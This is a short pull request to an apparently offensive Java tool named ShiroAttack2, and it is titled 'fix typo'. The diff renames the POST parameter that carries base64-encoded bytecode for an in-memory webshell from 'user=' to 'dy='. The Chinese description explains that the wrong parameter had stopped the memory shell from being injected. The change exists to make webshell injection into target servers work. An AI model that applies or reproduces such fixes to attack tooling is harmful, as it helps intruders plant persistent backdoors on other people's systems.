### PR TITLE
fix typo

### DIFF
--- a/src/main/java/com/summersec/attack/core/AttackService.java
+++ b/src/main/java/com/summersec/attack/core/AttackService.java
@@ -420,7 +420,7 @@ public class AttackService {
 
             try {
                 String b64Bytecode = MemBytes.getBytes(memShellType);
-                String postString = "user=" + b64Bytecode;
+                String postString = "dy=" + b64Bytecode;
                 String result = this.bodyHttpRequest(header, postString);
                 if (result.contains("->|Success|<-")) {
                     String httpAddress = Utils.UrlToDomain(this.url);


### PR DESCRIPTION
发包时参数写错了，导致bytecode没加载，所以内存马注不进去

https://github.com/SummerSec/ShiroAttack2/issues/11